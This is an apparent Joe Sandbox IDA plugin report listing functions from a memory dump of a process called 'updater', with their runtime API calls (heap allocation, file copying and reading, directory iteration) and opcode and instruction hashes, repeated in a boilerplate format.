Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 82a41ba6e35c890217f2af1e282365213f63c4f4c66e1d1c217bd7941a00bf2c
Instruction ID: b7d1547945e22fb167251a0c46de362c1345a0140f486fef6c5a74b8d353cd5f
Opcode Fuzzy Hash: 82a41ba6e35c890217f2af1e282365213f63c4f4c66e1d1c217bd7941a00bf2c
Instruction Fuzzy Hash: 50E06522A0653245EB26667F7C0076A55898FE5239B55032BF420861F4DBB445C24196

Uniqueness

Uniqueness Score: -1.00%

Function 013C2F83 Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 013C2F8F

Part of subcall function 014060E6: FindNextFileW.KERNEL32(?,?,?,013C2C78,?,?,?,?,?,?,?,?,00000000), ref: 014060EF

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 013C2FA1

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: ___std_fs_directory_iterator_advance@8$FileFindNext
String ID:
API String ID: 478157137-0
Opcode ID: 2b0e29ceb34528c5d78f59bbb15759e657e3eea70d7cfd01a994688803db12ea
Instruction ID: d502ebe5a879e7cbb279afe02c4737f530d8b3c5e66051e0bb4b342c2b403c84
Opcode Fuzzy Hash: 2b0e29ceb34528c5d78f59bbb15759e657e3eea70d7cfd01a994688803db12ea
Instruction Fuzzy Hash: 03E0863110410F7AEF02AA17DD0086B7B7AAFF1A58741803DFC0696661DB32EC7597A0

Uniqueness

Uniqueness Score: -1.00%

Function 01405D67 Relevance: 3.0, APIs: 2, Instructions: 20fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CopyFileW.KERNEL32 ref: 01405D77
GetLastError.KERNEL32(?,?,?,01406070,?,?,00000000,CE5F1F10), ref: 01405D8D

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CopyErrorFileLast
String ID:
API String ID: 374144340-0
Opcode ID: 9c502fc30ef1ba516502cd69b3ca2049dcbfd564a922c93a30f1d59b5b34dffa
Instruction ID: 5cb6351d6e94ad46e15636813b471d967b84dd4dcec89a1734aaf6a54078b3a1
Opcode Fuzzy Hash: 9c502fc30ef1ba516502cd69b3ca2049dcbfd564a922c93a30f1d59b5b34dffa
Instruction Fuzzy Hash: 20E04F34504149FFDB028BA6D808F6E7FA99F15245F08C066B844852A4DA74D5529B70

Uniqueness

Uniqueness Score: -1.00%

Function 0142114B Relevance: 3.0, APIs: 2, Instructions: 19COMMON

Download Yara Rule

APIs

___vcrt_FlsSetValue.LIBVCRUNTIME ref: 01421169
___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 01421174

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: Value___vcrt____vcrt_uninitialize_ptd
String ID:
API String ID: 1660781231-0
Opcode ID: fed47b1b3cc60b90d7949dab8b19b4f5ee74f104f189f04560ad071b0633872a
Instruction ID: b5cc17e27ebb2d5c0e48ea268da3cf17b6556d9cdd69fd71a14e308ac3af6444
Opcode Fuzzy Hash: fed47b1b3cc60b90d7949dab8b19b4f5ee74f104f189f04560ad071b0633872a
Instruction Fuzzy Hash: 14D0A9B1288673140C2422BA680087B2295593AEF43F0038FC42089AF1EBB280C261A2

Uniqueness

Uniqueness Score: -1.00%

Function 013FBE05 Relevance: 1.7, APIs: 1, Instructions: 224COMMON

Download Yara Rule

APIs

Part of subcall function 013E08C1: EnterCriticalSection.KERNEL32(?,00000000,?,013E04FE,01464914,013E0630,00000007,?,?,?,?,013E0374,?), ref: 013E08C9
Part of subcall function 013E08C1: GetCurrentThreadId.KERNEL32(?,013E04FE,01464914,013E0630,00000007,?,?,?,?,013E0374,?), ref: 013E08CF

_strlen.LIBCMT ref: 013FC011

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: CriticalCurrentEnterSectionThread_strlen
String ID:
API String ID: 1501162294-0
Opcode ID: 0c377826beeb036d6d98c981d553b537705ac4705d6a00265561c07a53ccbe31
Instruction ID: caa8bc585ef0eb8d469ac693ce1f75ad6dd3f0954ecbe05ffae1b35e6128efea
Opcode Fuzzy Hash: 0c377826beeb036d6d98c981d553b537705ac4705d6a00265561c07a53ccbe31
Instruction Fuzzy Hash: 1471E6B190031AEBDF15DF6DC880ABEBBB4EF15228F10402DEA14AB295D735DA45CF90

Uniqueness

Uniqueness Score: -1.00%

Function 013C8E25 Relevance: 1.6, APIs: 1, Instructions: 72COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 013C8E85

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: 2c9f057616eb082071618832780a5865458cac9570b2e72292cf114dfa45c5f3
Instruction ID: 9fc3f9f5935c0b0bfaa15c571fe061e727b87c9f9c707f0297c2f1007d6f14e7
Opcode Fuzzy Hash: 2c9f057616eb082071618832780a5865458cac9570b2e72292cf114dfa45c5f3
Instruction Fuzzy Hash: C421077290530AEFCB10EFADD880AEEBBB8EF64A04F50046FE405A7181D7705B48CB91

Uniqueness

Uniqueness Score: -1.00%

Function 013DF518 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

_Deallocate.LIBCONCRT ref: 013DF58A

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: Deallocate
String ID:
API String ID: 1075933841-0
Opcode ID: 06d55f0090a365e7cf1a2ee48323d961df7079bd84090b7898b360519a70f18c
Instruction ID: 70f1a3f1e064889e22bce15dc7ef57efd1de93da6443c3f56981cd5667a17d38
Opcode Fuzzy Hash: 06d55f0090a365e7cf1a2ee48323d961df7079bd84090b7898b360519a70f18c
Instruction Fuzzy Hash: 6811D2B5900345ABCB15DF69988099EBBBEEF95208B2444ADE8159B302D631DA17CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0142FA7F Relevance: 1.6, APIs: 1, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f67fc0833f2f13ac8401f326040f5c089a515492e9c3aaa48078c7d47b2aecd7
Instruction ID: 056c2137d38208d3833f98ca525b59982b0465d981bb94da12c6cbe9831cd1ad
Opcode Fuzzy Hash: f67fc0833f2f13ac8401f326040f5c089a515492e9c3aaa48078c7d47b2aecd7
Instruction Fuzzy Hash: FA01F5373102216FAF26CE6DEC4095B37AAAB842247D44222FA04DB2B8DA719885C791

Uniqueness

Uniqueness Score: -1.00%

Function 013C7B49 Relevance: 1.6, APIs: 1, Instructions: 56fileCOMMON

Download Yara Rule

APIs

ReadFile.KERNEL32(00000000,?,?,?,00000000), ref: 013C7BB4

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 72e3e38f9beaf686998eaae9f885e3e0044270fb66345c20daff7b025c5baa2f
Instruction ID: b4fcd7b7bbb5a8922e7ee6b6df0424f383ead311e042662307031d4e12da0751
Opcode Fuzzy Hash: 72e3e38f9beaf686998eaae9f885e3e0044270fb66345c20daff7b025c5baa2f
Instruction Fuzzy Hash: 95115B31600515BFEB059F29C804A9ABBB9FF14B64F008119ED6997610DB30FD60DFE0

Uniqueness

Uniqueness Score: -1.00%

Function 013DFF77 Relevance: 1.6, APIs: 1, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 013C128D

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::exception::exception
String ID:
API String ID: 2807920213-0
Opcode ID: 5111b80350756194ba4e98a0db365e94a0674f5821f07a26e42e8d2193d53873
Instruction ID: 7155f064ab0cba46efdcea5d90952d74e2f1bdaea229db6b1b45391692999834
Opcode Fuzzy Hash: 5111b80350756194ba4e98a0db365e94a0674f5821f07a26e42e8d2193d53873
Instruction Fuzzy Hash: DDF07D7240022D67C714BFAAEC04C9E7BAC9E20A58780056EF91C87651EB31ED4583D4

Uniqueness

Uniqueness Score: -1.00%

Function 01430C90 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 01430CCA

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 24c6a91bfff861d1c888fbf716f4d969e8e5f145bbe914a5df2ac1c2d60829cc
Instruction ID: 0abf333d15ee3075d1bcea84184132e6e211e0ee5f988d7b62da36c1ed62000b
Opcode Fuzzy Hash: 24c6a91bfff861d1c888fbf716f4d969e8e5f145bbe914a5df2ac1c2d60829cc
Instruction Fuzzy Hash: B2113971A0420AAFCF05DF58E94599F7BF9EF88304F15406AF809EB361D630EA15CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 01438DE8 Relevance: 1.6, APIs: 1, Instructions: 52COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 014300C6: RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0143063D,00000001,00000364,00000005,000000FF,?,?,01423CA9,01430149,?,?,0142DA9C), ref: 01430107

_free.LIBCMT ref: 01438E57

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: deb1c0a4bcfdfdda9140dc86cca0d54468f7f47de27033a236988258eda4d6b1
Instruction ID: 6606779104dee256078dc4247f7c6bdabd50f5699781284c0292f48a1432dded
Opcode Fuzzy Hash: deb1c0a4bcfdfdda9140dc86cca0d54468f7f47de27033a236988258eda4d6b1
Instruction Fuzzy Hash: 2A012672600317ABC3318F59D88199AFB98EB987B0F00072EF555B76D0E770A8118BB4

Uniqueness

Uniqueness Score: -1.00%

Function 014252C7 Relevance: 1.6, APIs: 1, Instructions: 50COMMON

Download Yara Rule

APIs

__alldvrm.LIBCMT ref: 0142532F

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: __alldvrm
String ID:
API String ID: 65215352-0
Opcode ID: 0460f07f0d12403b60dde8756b98344bfb9af85e1b97c0701680bafdc2b72f66
Instruction ID: 8283a509bfb4c00cf7f005c3302b7cec1b1178d38f66c020559f8c6ca49b2f86
Opcode Fuzzy Hash: 0460f07f0d12403b60dde8756b98344bfb9af85e1b97c0701680bafdc2b72f66
Instruction Fuzzy Hash: 1501B572810214BFEB14DF65C845BEEB7E8FB61229F50855EE502AB250D674BA80CB64

Uniqueness

Uniqueness Score: -1.00%

Function 0142314E Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ca8e9e532a719df361b6c9cb492d982898333f57b032a82f79c94fe4b91144b
Instruction ID: ad9378257e0604a498cbe46a82aa4dfbf3804e785783c72d21e05e8cf16dce4e
Opcode Fuzzy Hash: 7ca8e9e532a719df361b6c9cb492d982898333f57b032a82f79c94fe4b91144b
Instruction Fuzzy Hash: 76F02D325006215AEA217E3BDC00B6B36B96FFD730F64071BE864932F0CB38D446C591

Uniqueness

Uniqueness Score: -1.00%

Function 0143C3EE Relevance: 1.5, APIs: 1, Instructions: 42COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0143C451

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 5c2e12cd716acd2ee769000e0b8b80a9b3a91afc9e7156e1fe6f41a9e9f94f89
Instruction ID: 355bebd92dadb10cb031ac9bace20bb6cd60301ffdf20396c79566263c968cdc
Opcode Fuzzy Hash: 5c2e12cd716acd2ee769000e0b8b80a9b3a91afc9e7156e1fe6f41a9e9f94f89
Instruction Fuzzy Hash: 0701E172C00159AFDF01AFE98C019EE7FB5AB6C210F144566EA64F21A0E6318A619B91

Uniqueness

Uniqueness Score: -1.00%

Function 014300C6 Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,?,00000000,?,0143063D,00000001,00000364,00000005,000000FF,?,?,01423CA9,01430149,?,?,0142DA9C), ref: 01430107

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7533c4e3e399c8a29c4595027c52037eb6a2db441b8a9d3a3a394da9b969e6b7
Instruction ID: 3d3ac95e93369f2b82559e769635f104aa2467bfefe7459e96a067566ee14098
Opcode Fuzzy Hash: 7533c4e3e399c8a29c4595027c52037eb6a2db441b8a9d3a3a394da9b969e6b7
Instruction Fuzzy Hash: 12F0243260122466AF351A3AAC10B5BBB689FD9670B088217F914A72F5CA30D44282E0

Uniqueness

Uniqueness Score: -1.00%

Function 0141DC67 Relevance: 1.5, APIs: 1, Instructions: 39COMMONLIBRARYCODE

Download Yara Rule

APIs

std::exception::exception.LIBCMT ref: 013C128D

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: std::exception::exception
String ID:
API String ID: 2807920213-0
Opcode ID: 7ce0ff713a16d39ae8c3fa38efda021c20983d459cd13500aa01237c12638d10
Instruction ID: 56160304bd6855bb00d763b69de86e56a8929c4053b1c0da09ad5052865804d9
Opcode Fuzzy Hash: 7ce0ff713a16d39ae8c3fa38efda021c20983d459cd13500aa01237c12638d10
Instruction Fuzzy Hash: 45F0E9B580030EB7CB147AEEEC0889A7F5C8E21AB4750453BFE18969B0EB71D995D6D0

Uniqueness

Uniqueness Score: -1.00%

Function 013C2B95 Relevance: 1.5, APIs: 1, Instructions: 35COMMON

Download Yara Rule

APIs

___std_fs_directory_iterator_advance@8.LIBCPMT ref: 013C2BAE

Part of subcall function 014060E6: FindNextFileW.KERNEL32(?,?,?,013C2C78,?,?,?,?,?,?,?,?,00000000), ref: 014060EF

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: FileFindNext___std_fs_directory_iterator_advance@8
String ID:
API String ID: 3878998205-0
Opcode ID: 1e3f53b99c73df3d8f3de25c2ac6dd250ce164a3f3b04e89b11d6b26aa243de7
Instruction ID: 09c6862a22427560695087e84b383205fdb6682e9555c2af192941f948e90b53
Opcode Fuzzy Hash: 1e3f53b99c73df3d8f3de25c2ac6dd250ce164a3f3b04e89b11d6b26aa243de7
Instruction Fuzzy Hash: 53F0E2312046054BEF38AA2DDD14BBBB7ECAF90B1DF00046E9942D3051EAB0EC40C750

Uniqueness

Uniqueness Score: -1.00%

Function 014221F8 Relevance: 1.5, APIs: 1, Instructions: 33libraryloaderCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetProcAddress.KERNEL32(00000000,?,01464064,00000000,?,0142234A,00000004,InitializeCriticalSectionEx,0144BC58,0144BC60,00000000,?,01422109,01464064,00000FA0,00000000), ref: 01422229

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: AddressProc
String ID:
API String ID: 190572456-0
Opcode ID: 49ea5786ec8986e2e7c000c2203b5586f7a0ff12cdea0547497855a152d8ef3d
Instruction ID: da72b337ce7dd3c2aabba12cd1c6c2e4dc2b9291b378e02605a53abc85fc6e0c
Opcode Fuzzy Hash: 49ea5786ec8986e2e7c000c2203b5586f7a0ff12cdea0547497855a152d8ef3d
Instruction Fuzzy Hash: B8F012362052269B9F215FA9A800C5BB798EF527617540126FE14D72A0DB72D46187A1

Uniqueness

Uniqueness Score: -1.00%

Function 0143255C Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,?,?,0143838D,00000220,?,?,?,?,?,?,01423E8D,?), ref: 0143258E

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: ca6fc7b75ab72121bb7e9a3007a9f71e9a0f92efbe319688626fb89780c716e2
Instruction ID: 72f302971058cf3fa610280a81b3298fd0c60248e5a0052f27d665f3f8c1c404
Opcode Fuzzy Hash: ca6fc7b75ab72121bb7e9a3007a9f71e9a0f92efbe319688626fb89780c716e2
Instruction Fuzzy Hash: DAE0E56124123257EA312A6A8C20F5B7B489FED6B1F460117DD0B922F0CBF4CA4282A5

Uniqueness

Uniqueness Score: -1.00%

Function 013C3139 Relevance: 1.5, APIs: 1, Instructions: 30COMMON

Download Yara Rule

APIs

___std_fs_copy_file@12.LIBCPMT ref: 013C315D

Part of subcall function 013C2966: __EH_prolog2.LIBCMT ref: 013C296D

Memory Dump Source

Source File: 00000001.00000002.1010290414.00000000013C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 013C0000, based on PE: true

Associated: 00000001.00000002.1010282834.00000000013C0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010421814.0000000001447000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010451913.0000000001462000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000001.00000002.1010463431.0000000001467000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_13c0000_updater.jbxd

Yara matches

Similarity

API ID: H_prolog2___std_fs_copy_file@12
String ID:
API String ID: 1952593469-0
Opcode ID: 2ca224bd62a12594fcbb4fef358a29d57bc5e039242b6aa38988b2ac860f49b8
Instruction ID: aeec3bd98d01e56af5cb5387d081e561bf52f957af32d4b58d86097fdae58106
Opcode Fuzzy Hash: 2ca224bd62a12594fcbb4fef358a29d57bc5e039242b6aa38988b2ac860f49b8
Instruction Fuzzy Hash: A4E0683032020167C225794EAC08A57B7BEFFC2E25B14422EE81883280EF20AD10C7F5

Uniqueness

Uniqueness Score: -1.00%

